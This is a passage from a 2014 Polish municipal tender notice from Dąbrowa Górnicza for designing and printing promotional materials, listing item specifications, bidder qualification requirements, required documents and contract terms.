Szacowany nakład 5000 szt.
format A3 składana do formatu 297mm x 105mm
kolor 4+4
papier offset min. 150g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni
  
50. Projekt i druk ulotek -  wyścig kolarski
Szacowany nakład 1000 szt.
format A4 składana na pół
kolor 4+4
papier offset min. 150g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni
  
51.Projekt i druk plakatów związanych z organizacją imprez sportowych w mieście
Szacowany nakład 600 szt.
format B2
kolor 4+0
papier kreda min. 120 g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3  dni
  
52.Projekt i druk plakatów Akcja Lato w mieście 2014
Szacowany nakład 300 szt.
format B2 (70cm x 50cm)
kolor 4+0
papier kreda błysk min.  135g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni  

53.Projekt i druk plakatów Akcja Zima w mieście
Szacowany nakład 300 szt.
format B2 (70cm x50 cm)
kolor 4+0
papier kreda błysk min. 135g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni 

54.Projekt i druk certyfikatów dla uczestników biegów Polska biega
Szacowany nakład 400 szt.
format A5
kolor 4+0
papier kreda min. 250 g
częstotliwość dostawy jednorazowo
termin wykonania projektu certyfikatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia certyfikatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

55.Projekt i druk zaproszeń Światowy Dzień Zdrowia
Szacowany nakład 200 szt.
format A4 składane na trzy części
kolor 4+4
papier kreda min. 250 g
częstotliwość dostawy jednorazowo
termin wykonania projektu zaproszenia  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia zaproszeń do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 4 dni

56.Projekt i druk plakatów  Dąbrowa Górnicza mówi NIE  uzależnieniom
Szacowany nakład 250 szt.
format A2 
kolor 4+0
papier kreda min. 150 g
częstotliwość dostawy w siedmiu terminach
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

57.Projekt i druk broszur informacyjnych
Szacowany nakład 1000 szt.
format A4 składane na trzy części
kolor 4+4
papier kreda  błysk min. 135 g
częstotliwość dostawy jednorazowo
termin wykonania projektu broszury  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia  broszur  do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

58.Projekt i druk informatorów (XXII Ogólnopolski Przegląd Abstynenckiej  Twórczości Art.  Zamczysko 2014)
Szacowany nakład 600 szt.
format A5 składane i zszywane w książeczkę
objętość: 16 str. +  4 strony okładka
kolor 1+1 
papier offsetowy min. 80 g
okładka : papier offsetowy min.80 g , foliowana, kolor 4+4, zszycie zeszytowe
częstotliwość dostawy jednorazowo
termin wykonania projektu  informatora  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia  informatorów  do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

59.Druk  broszury Możesz zapanować nad zagrożeniem
Szacowany nakład  1000 szt.
format A5 
objętość: 12 kart/24 strony, druk dwustronny + okładka
kolor pełny
papier offsetowy min. 80 g
okładka : papier kreda min.200 g , zszycie zeszytowe, full kolor 
częstotliwość dostawy jednorazowo
termin wykonania i dostarczenia  broszur  do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 30 dni

60.Projekt i druk instrukcji Sygnały Alarmowe
Szacowany nakład: 1000 szt.
format: 480x650 mm
full kolor
papier kreda offsetowy min. 200 g
objętość: 1 karta
częstotliwość dostawy jednorazowo
termin wykonania projektu  instrukcji  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 10 dni
termin wykonania i dostarczenia  instrukcji  do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 30 dni

Dalsza cześć przedmiotu zamówienia znajduje się w sekcji IV.4.16 ogłoszenia.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówienia podstawowego,o których mowa w art. 67 ust.1 pkt. 6 ustawy.
Realizacja zamówień uzupełniających odbywać się będzie w zakresie przewidzianym przedmiotem zamówienia. Wartość szacunkowa zamówień uzupełniających wyniesie nie więcej niż 50% wartości zamówienia podstawowego 
z uwzględnieniem podziału na części.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.25.00-7, 79.82.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadania 1 i zadania 2:
Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 ustawy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot.  zadanie 1:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  lub wykonuje należycie:
a) minimum 2 usługi polegające  na  projektowaniu i drukowaniu ulotek, plakatów, naklejek, zaproszeń, broszur, dyplomów, notesów, informatorów  o wartości nie mniejszej niż 50.000 zł  brutto każda, przy czym każda usługa powinna zawierać co najmniej 5 różnych produktów z w/w katalogu produktów;
b) minimum 1 usługę polegającą na projektowaniu i drukowaniu kalendarzy o wartości nie mniejszej niż 10.000 zł brutto;

dot. zadanie 2:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie  minimum 1 usługę polegającą na projektowaniu i drukowaniu billboardów  o wartości nie mniejszej niż 25.000 zł brutto.

Uwagi (dotyczy zadania 1 i 2): 
1. Jeżeli zakres usług wskazanych przez Wykonawcę w wykazie usług jest szerszy niż wymagany przez Zamawiającego, Wykonawca winien w wykazie wskazać wartość usług odpowiadających zakresowi wymaganemu przez Zamawiającego.
2. Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym ogłoszenie o niniejszym postępowaniu zostało zamieszczone w Biuletynie Zamówień Publicznych.
3. W przypadku usług będących w trakcie wykonywania Wykonawca winien wykazać, że wartość usługi wykonanej do upływu terminu składania ofert jest nie mniejsza niż podana w warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadanie 1:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje: 

a) minimum jedną maszyną do druku offsetowego co najmniej 4-kolorowego, w formacie minimum B3, z prędkością druku co najmniej 15 tysięcy arkuszy/godzinę. 

b) minimum 2 stacjami graficznymi. Każda stacja graficzna musi posiadać minimum dwa programy w pełnej wersji spośród wymienionych poniżej: 
                        - Adobe Photoshop lub równoważny
                        - Ilustrator lub równoważny
                        - InDesign lub równoważny
                        - Corel Draw lub równoważny;

dot. zadanie 2: 
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje minimum jedną maszyną do druku wielkoformatowego w rozdzielczości co najmniej 720x720 dpi, eko-solventowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadania 1 i zadania 2:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje  osobami zdolnymi do wykonania zadania stanowiącego przedmiot zamówienia tj. minimum 2 grafikami  z co najmniej trzyletnim doświadczeniem zawodowym każdy.
Dopuszcza się wykazanie tych samych grafików na każde zadanie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadania 1 i zadania 2:
Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 ustawy (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy usług pozwalających wykazać, iż Wykonawca spełnia warunek określony w pkt. 8.1.2.1 SIWZ - dot. zadania 1 i (-lub) w pkt. 8.1.2.2 SIWZ - dot. zadania 2.  
W wykazie nie należy podawać informacji o usługach niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 Ustawy (zdanie 2) - dotyczy zadania 1 i 2.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy - załącznik nr 1/1 i/lub 1/2 do SIWZ (wskazana data podpisania);
2. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3.w przypadku, gdy Wykonawca będzie  polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z art. 26 ust. 2b ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwości dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1.1. w zakresie zmiany terminu wykonania zamówienia na skutek wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu.
1.2. W pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
1.2.1. poprawa jakości lub innych parametrów charakterystycznych dla danego elementu zamówienia,
1.2.2. zmiany obowiązujących przepisów prawa,
1.2.3.zmiany podatku VAT na skutek zmian w przepisach prawnych:
a) w przypadku zwiększenia stawki podatku VAT ceny brutto nie mogą być wyższe niż zadeklarowane w ofercie przez cały okres obowiązywania umowy,
b)w przypadku zmniejszenia stawki podatku VAT ceny brutto zostaną odpowiednio pomniejszone w odniesieniu do cen zadeklarowanych w ofercie. Maksymalna nominalna wartość umowy może ulec zmniejszeniu.
2. W przypadku wystąpienia wyżej wymienionych okoliczności strony poinformują się natychmiast o ich zaistnieniu.
3. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
4.Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
5. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 8/1 i (-lub) 8/2 do SIWZ - projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej 41-300 Dąbrowa Górnicza,
ul. Graniczna 21, Wydział Promocji, Kultury i Sportu, piętro III.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2014 godzina 09:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Ciąg dalszy sekcji II.1.4. ogłoszenia: 
61.Projekt i druk broszury zawierającej prace z konkursu plastycznego
Szacowany nakład: 1800 kart (6 x 300 egzemplarzy)
format: A4
full kolor
papier kreda offsetowy min. 200 g
objętość: 6 kart o różnej tematyce (każda tematyka w ilości 300 egzemplarzy)
częstotliwość dostawy jednorazowo
termin wykonania projektu  broszury  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 10 dni
termin wykonania i dostarczenia  broszur  do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 30 dni
62.Projekt i druk plakatów  z okazji obchodów Dnia Ziemi
Szacowany nakład  80 szt.
format A3 
kolor pełny
papier offsetowy min. 100 g
częstotliwość dostawy jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni
63.Projekt i druk zaproszeń z okazji obchodów Dnia Ziemi
szacowany nakład  30 szt.
format: A5
kolor pełny
papier  kreda min. 250 g
częstotliwość dostawy jednorazowo
termin wykonania projektu zaproszenia liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia zaproszeń do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni
64.Projekt i druk plakatów  z  zakresu udzielania pomocy zwierzętom dziko żyjącym 
szacowany nakład  300 szt.
format: A4 składane na pół
kolor pełny
papier offsetowy min. 100 g
częstotliwość dostawy jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni
65.Projekt i druk ulotek promujących obchody Światowego Tygodnia Przedsiębiorczości 
Szacowany nakład  500 szt.
format  1/3  A 4
kolor 4+4 (dwustronnie)
papier satyna  min. 200 g
częstotliwość dostawy: jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 2 dni
66. Projekt i druk plakatów promujących obchody Światowego Tygodnia Przedsiębiorczości
Szacowany nakład  100 szt.
format A 2
kolor 4+0 (jednostronnie)
papier kreda min. 120 g
częstotliwość dostawy jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 2 dni
67. Skład (wg dostarczonego projektu) i druk folderu podsumowującego projekt: Miejskie Innowacje Rewitalizacyjne w Dąbrowie Górniczej 
szacowany nakład  300 szt.
format:  210 mm x 210 mm
objętość: 36 stron + okładka
kolor 4+4 lakier offsetowy
lakier UV wybiórczy, zszywki płaskie
okładka: papier kreda mat min. 300 g
środek: papier kreda mat min. 170 g
częstotliwość dostawy jednorazowo
termin wykonania i dostarczenia folderów do Zamawiającego liczony od dnia dostarczenia projektu - nie dłużej niż 10 dni
68.Projekt i wydruk plakatów promujących konkursy organizowane przez BRI
Szacowany nakład: 100 szt.
format A2
kolor 4+0 (jednostronnie)
papier  kreda min. 135 g błysk
częstotliwość dostawy jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni
69. Projekt i druk ulotki promującej seminarium lokalne organizowane w ramach projektu: RE-GREEN
Szacowany nakład: 80 egz
format B5 
kolor 4+4 (dwustronnie)
papier kreda min. 150g
folia błysk
częstotliwość dostawy - jednorazowo dla każdej edycji
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego ulotki liczony od dnia zaakceptowania projektu - nie dłużej niż  2 dni    
70.Druk obwieszczeń o obwodach wyborczych w wyborach do Parlamentu Europejskiego
Szacowany nakład:  600 szt.
format  A1
kolor 4+0
papier kreda mat   min. 100 g
częstotliwość dostawy jednorazowo
termin wykonania i dostarczenia obwieszczeń do Zamawiającego liczony od dnia przekazania projektu - nie dłużej niż 7 dni
71.Druk obwieszczeń o obwodach wyborczych w wyborach samorządowych
Szacowany nakład:  600 szt.
format  A1
kolor 4+0
papier kreda mat   min. 100 g
częstotliwość dostawy jednorazowo
termin wykonania i dostarczenia obwieszczeń do Zamawiającego liczony od dnia przekazania projektu - nie dłużej niż 7 dni
72.Druk obwieszczeń o okręgach wyborczych w wyborach samorządowych
Szacowany nakład:  600 szt.
format  B2
kolor 4+0
papier kreda mat   min. 100 g
częstotliwość dostawy jednorazowo
termin wykonania i dostarczenia obwieszczeń do Zamawiającego liczony od dnia przekazania projektu - nie dłużej niż 7 dni
73.Druk obwieszczeń o kandydatach na radnych w wyborach samorządowych
Szacowany nakład:  600 szt.
format  A1
kolor 4+0
papier kreda mat   min. 100 g
częstotliwość dostawy jednorazowo
termin wykonania i dostarczenia obwieszczenia do Zamawiającego liczony od dnia przekazania projektu - nie dłużej niż 7 dni
74.Druk ulotek Instrukcja głosowania dotyczących budżetu partycypacyjnego
Szacowany nakład:  3000 szt.
format  A4
kolor 4+0
papier kreda błysk min. 135 g
częstotliwość dostawy jednorazowo
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia przekazania projektu - nie dłużej niż 7 dni

Zadanie II Wykonanie materiałów reklamowych na billboardy
1. Projekt materiałów reklamowych na billboardy
szacowana ilość projektów - 20 sztuk
częstotliwość wykonania  - jednorazowo dla każdego projektu
termin wykonania projektu billboardu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
2. Druk materiałów reklamowych na billboardy
format 3 m x 5 m
kolor 4+0
papier billboardowy, minimum 120g, przeznaczony do druku eko-solventowego
szacowana ilość drukowanych billboardów - 160 sztuk
częstotliwość dostawy - jednorazowo dla każdego projektu, przy czym jednorazowa ilość drukowanych billboardów będzie uzależniona od bieżących potrzeb Zamawiającego
termin wykonania i dostarczenia do Zamawiającego billboardu liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

Uwagi do przedmiotu zamówienia (dotyczy zadania 1 i zadania 2):
1. Wszystkie terminy wykonania projektu oraz wykonania i dostarczenia przedmiotu zamówienia podane są w dniach roboczych. 
2. Zamówienie realizowane będzie do wysokości środków budżetowych zabezpieczonych na ten cel.
3. Podane ilości materiałów informacyjno - promocyjnych są ilościami szacunkowymi podanymi dla prawidłowej oceny wartości ofert. Zamawiający zastrzega sobie prawo zmiany ilości zamawianych materiałów i ograniczenia planowanej ilości zleceń z zastrzeżeniem, że Zamawiający zrealizuje przedmiot zamówienia na wartość nie mniejszą niż 80% maksymalnej nominalnej wartości umowy.
4. Zamawiający zastrzega sobie prawo w wyjątkowych sytuacjach do skrócenia wymaganego terminu wykonania projektu i druku materiałów informacyjno  - promocyjnych oraz w każdym momencie realizacji przedmiotu umowy do personalizacji wybranych materiałów informacyjno - promocyjnych.
5. W sytuacjach wymagających współdziałania w zakresie opracowywania poszczególnych projektów, Zamawiający zastrzega sobie prawo do dokonywania uzgodnień i projektowania w siedzibie Zamawiającego tj. 41-300 Dąbrowa Górnicza ul. Graniczna 21, nie częściej niż 1 raz w tygodniu i nie dłużej niż 3 godziny. 
6. Zamówienie realizowane będzie sukcesywnie według potrzeb Zamawiającego na podstawie zleceń cząstkowych składanych za pomocą poczty elektronicznej. 
7. Dowodem zrealizowania zamówień cząstkowych będzie podpisanie protokołu odbioru  zaakceptowanego przez Zamawiającego i Wykonawcę.
8. Zamawiający wyraża każdorazowo w formie elektronicznej akceptację treści i wzoru wykonywanych projektów - w terminie 2 dni roboczych od dnia ich otrzymania. Wykonawca zobowiązany jest do przedstawienia Zamawiającemu dwóch różnych projektów zamawianego materiału, przy czym Zamawiający wybierze i zaakceptuje do druku 1 projekt. W razie braku akceptacji przedłożonych projektów  przez Zamawiającego, Wykonawca zobowiązany jest do przedłożenia w terminie 2 dni roboczych dwóch nowych propozycji projektów. W przypadku, gdy trzecia para projektów nie uzyska akceptacji, Zamawiający zastrzega sobie prawo do odstąpienia od zlecenia. Wykonawcy nie przysługuje wynagrodzenie za niezaakceptowane projekty.
9. W przypadku zgłoszenia przez Zamawiającego uwag do danego projektu Wykonawca zobowiązany jest do wprowadzania zmian w projekcie zgodnie z uwagami Zamawiającego do momentu ich ostatecznego zaakceptowania przez Zamawiającego. 
10. W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany jest do dostawy zamawianych materiałów  promocyjno - informacyjnych, własnym środkiem transportu i na własne ryzyko do siedziby Zamawiającego tj. 41-300 Dąbrowa Górnicza ul. Graniczna 21. Materiały te powinny być opisane, odpowiednio zabezpieczone przed zniszczeniem lub rozkompletowaniem. Wykonawca zobowiązany jest do wymiany zniszczonych egzemplarzy, czy też wykonanych niezgodnie z warunkami zamówienia, na nowe w terminie uzgodnionym z Zamawiającym. 
11. Zamawiający przekazywać będzie Wykonawcy treści merytoryczne do wydruku czy do zamieszczania w materiałach w formie elektronicznej wraz z danym zleceniem cząstkowym, o którym mowa w pkt. 6.
